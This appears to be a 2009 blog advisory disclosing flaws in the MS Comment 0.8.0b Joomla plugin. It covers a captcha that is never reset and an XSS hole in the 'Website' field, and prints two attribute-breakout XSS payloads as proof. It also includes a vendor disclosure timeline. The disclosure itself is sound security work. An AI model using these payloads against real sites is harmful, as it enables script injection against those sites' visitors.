Jeff Channell | MS Comment 0.8.0b Multiple Vulnerabilities | Joomla!

MS Comment 0.8.0b Multiple Vulnerabilities

Thursday, 17 September 2009 00:00

MS Comment 0.8.0b for Joomla, a commenting plugin, suffers from an multiple vulnerabilities.

Captcha Cracking

The submission uses AJAX and fails to reset the captcha after a submission. Read once, write many.
Website Input XSS

The 'Website' input field is checked for html markup, but fails to sanitize extra parameters.
```
" onmouseover="alert(String.fromCharCode(88,83,83))
```
```
" style="color:expression(alert(String.fromCharCode(88,83,83)))
```
Timeline
- Vulnerabilites Discovered: 31 July 2009
- Vendor Notified: 31 July 2009
- Vender Response: ... 2009
- Update Available: ... 2009
- Disclosure: 17 September 2009

Last Updated on Thursday, 17 September 2009 22:29

Add your comment

Your name:
Comment:

Word verification:

Featured Extensions

JNoGuest

$5.00

Metarizer

$1.00

Joonami

$1.00
FREE
You Save: $1.00

JTemplateInfo

$3.00

Latest Articles

Most Popular

Jeff Channell

Cart

Your Cart is currently empty.

Keywords

fix . exploit . xss . error . javascript . php . release . template . component . bbcode . vulnerability . update . list . fairmont . jomsocial . wtf . jmylife . plugin . jnoguest . as3 . module . extension . linux . mootools . custom . jquery . flash . joomla . flex . css .

Template Info

Name
Circles
Creation Date
06/28/09
Author
Jeff Channell
Author Email
me@jeffchannell.com
Author URL
http://jeffchannell.com
Version
0.0.2
Description
Circles

Captcha Cracking

Website Input XSS

Timeline